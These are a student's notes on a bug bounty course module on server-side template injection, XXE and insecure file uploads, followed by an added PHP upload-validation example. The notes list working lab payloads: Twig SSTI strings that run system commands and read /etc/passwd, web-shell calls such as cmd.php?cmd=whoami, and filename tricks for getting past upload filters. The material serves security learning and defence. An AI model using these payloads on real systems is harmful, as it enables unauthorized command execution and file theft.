Practical Bug Bounty — TCM Academy | Module 8 pt.3 (SSTI, XXE, Insecure File Uploads)


Mohammad Awab Hassan Nizami

Templates are used to separate the presentation layer from the logic layer. Template injection occurs when user input is evaluated as part of a template.

Exploiting Server-Side Template Injection (SSTI)

Since we know the application uses the Twig template engine (PHP), let's check HackTricks for payloads.

Attacks:

- {{7*7}}
- {{['id']|filter('system')}}
- {{['cat\x20/etc/passwd']|filter('system')}}

Server-Side Template Injection (SSTI) Challenge Walkthrough

Start by testing the previous payloads.

Attacks:

- {{7*7}}
- {{['id']|filter('system')}}

XML External Entity (XXE) Injection

Some applications use XML to transfer data.

Attacks:

- Edit the <creds></creds> tags.
- Get the exploit from PayloadsAllTheThings.

You can test many things with file uploads. In some cases we can overwrite files or might DDoS the system.

Insecure File Upload Client-Side Controls Bypass

First, analyze the web application.

Attacks:

- Change the extension in the request and bypass.
- Remove bytes and add a PHP shell.
- ffuf -u URL/FUZZ -w /usr/share/wordlists/common
- ffuf -u URL/labs/FUZZ -w /usr/share/wordlists/common
- URL/labs/uploads/cmd.php?cmd=whoami

Insecure File Upload Bypasses

Attacks:

- Try logo.php%0.png
- Try logo.php.png
- Add the payload after the magic bytes.
- If the application is blocking .php, you can use other PHP extensions.

Insecure File Uploads Challenge Walkthrough

Attacks:

- Try different extensions.
- localhost/labs/uploads/file.phtml?cmd=whoami
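
Seen from the server side, the bypasses in the file-upload notes above (changed extension, logo.php.png, logo.php%0.png, alternate PHP extensions such as .phtml, payload after the magic bytes) are all closed by the same set of checks. The PHP below is an added example, not code from the course or its labs; the function name safe_upload_name, the PNG/JPEG allowlist and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: server-side upload validation (not from the course labs).
// Assumptions: only PNG/JPEG images are expected, and the returned name is
// used to store the file where the web server never executes scripts.

const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];

function safe_upload_name(string $clientName, string $bytes): ?string
{
    // Reject control bytes, percent-encoding and path separators (logo.php%0.png).
    if (preg_match('/[\x00-\x1f%\/\\\\]/', $clientName)) {
        return null;
    }
    // Exactly one dot: logo.php.png has two, so it is refused outright
    // instead of guessing which extension the web server will honour.
    $parts = explode('.', $clientName);
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }
    // Allowlist, not blocklist: .php, .phtml and other PHP extensions never match.
    $ext = strtolower($parts[1]);
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // The content type sniffed from the bytes must agree with the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    // Magic bytes do not prove the rest of the file is harmless, so the
    // stored name is server-generated and keeps only the allowlisted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs mirroring the file names in the notes above.
$png = "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16);
$samples = [
    'logo.png'       => $png,
    'logo.php.png'   => $png,
    'logo.php%0.png' => $png,
    'file.phtml'     => $png,
    'cmd.php'        => '<?php /* constructed */ ?>',
    'logo.jpg'       => $png, // extension and content disagree
];
foreach ($samples as $name => $bytes) {
    $stored = safe_upload_name($name, $bytes);
    printf("%-16s => %s\n", $name, $stored ?? 'rejected');
}
```

Store the file under the returned name in a directory the web server serves as static content only, so the client-supplied filename never reaches the disk.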